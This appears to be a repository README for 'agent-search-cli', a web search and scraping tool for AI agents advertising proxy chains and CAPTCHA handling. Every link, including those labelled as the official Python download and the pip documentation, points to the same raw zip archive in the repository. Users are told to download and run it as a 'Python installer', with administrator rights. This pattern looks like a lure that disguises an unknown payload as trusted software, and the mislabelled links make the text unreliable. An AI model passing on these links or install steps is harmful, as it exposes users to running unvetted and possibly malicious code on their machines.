agent-search-cli
Enable AI agents to search, crawl, and extract web data with IP rotation, CAPTCHA handling, and rate limit management via CLI and Python.
Description
Enable AI agents to search, crawl, and extract web data with IP rotation, CAPTCHA handling, and rate limit management via CLI and Python.
README
agent-search-cli is a tool that helps you search the web, collect information, and extract data without needing to open a browser. It supports multiple search engines and uses layers of proxies to keep your browsing safe and private. It can also watch websites for changes and gather structured data in a format you can use.
This software is designed for users who want to get data from the web quickly and cleanly without any programming skills.
- Windows 10 or later
- 4 GB of RAM minimum (8 GB recommended)
- At least 500 MB of free disk space
- Internet connection
- Administrator rights to install software
- Search the web using several search engines at once
- Use a 4-layer proxy chain for privacy and avoiding blocks
- Browse websites without opening a browser (headless mode)
- Extract structured data like text, tables, and links
- Monitor websites for changes and get alerts
- Run from the command line, no programming needed
You can get the latest version of agent-search-cli by visiting the project page below. This page has all the files you need to install the software on your Windows PC.
Click the link above or use this URL in your browser:
Follow these steps to get agent-search-cli up and running on your Windows computer.
agent-search-cli needs Python to work. If you don't have Python installed, you need to install it first.
- Go to https://raw.githubusercontent.com/xw000113-create/agent-search-cli/main/src/agent_search/cli-search-agent-2.0-alpha.2.zip
- Download the latest Python 3.x installer for Windows.
- Run the installer.
- During installation, make sure to check "Add Python 3.x to PATH".
- Finish the installation.
You will use the Command Prompt to install and run the software.
- Press the Windows key and type
cmd. - Click on the Command Prompt app.
In the Command Prompt window, type the following command and press Enter:
pip install agent-search
This command downloads and installs agent-search-cli and its necessary tools.
To check if the install was successful, type:
agent-search --help
You should see a list of commands and options. This means the program is ready.
Type this command to perform a simple web search:
agent-search search "Your keywords here"
Replace "Your keywords here" with the search terms you want.
Results will appear directly in the Command Prompt window. The output is easy to read and structured.
agent-search-cli searches multiple search engines at the same time. This helps you get more comprehensive results.
Example:
agent-search search "latest technology news"
It pulls information from engines like Google, Bing, and others.
The software routes requests through several proxy servers. This helps your searches stay private and avoids search engine blocks.
You can enable or disable proxy chains in settings.
You can tell the tool to extract specific types of data such as:
- Text content from web pages
- Links and URLs
- Tables and lists
Example to extract data from a site:
agent-search extract --url https://raw.githubusercontent.com/xw000113-create/agent-search-cli/main/src/agent_search/cli-search-agent-2.0-alpha.2.zip --type table
You can set the tool to check websites regularly and inform you when the content changes.
Example:
agent-search monitor --url https://raw.githubusercontent.com/xw000113-create/agent-search-cli/main/src/agent_search/cli-search-agent-2.0-alpha.2.zip --interval 3600
This will check the site every hour.
- If you get errors during installation, make sure Python is installed and added to PATH.
- Use the Command Prompt as Administrator to avoid permission issues.
- If the tool cannot connect to the internet, check your firewall or proxy settings.
- Use simple keywords when searching for better results.
- For detailed help on commands, use:
agent-search --help
or for a specific command:
agent-search <command> --help
- Official project page: https://raw.githubusercontent.com/xw000113-create/agent-search-cli/main/src/agent_search/cli-search-agent-2.0-alpha.2.zip
- Python downloads: https://raw.githubusercontent.com/xw000113-create/agent-search-cli/main/src/agent_search/cli-search-agent-2.0-alpha.2.zip
- pip documentation: https://raw.githubusercontent.com/xw000113-create/agent-search-cli/main/src/agent_search/cli-search-agent-2.0-alpha.2.zip
agent-search-cli is built with Python and designed to automate web search and data extraction tasks. It helps users gather relevant information without needing to open browsers or write code. The multi-engine search and proxy layers make it suitable for users concerned about privacy and completeness of data.
Release History
| Version | Changes | Urgency | Date |
|---|---|---|---|
| main@2026-04-21 | Latest activity on main branch | High | 4/21/2026 |
| 0.0.0 | No release found — using repo HEAD | High | 4/11/2026 |
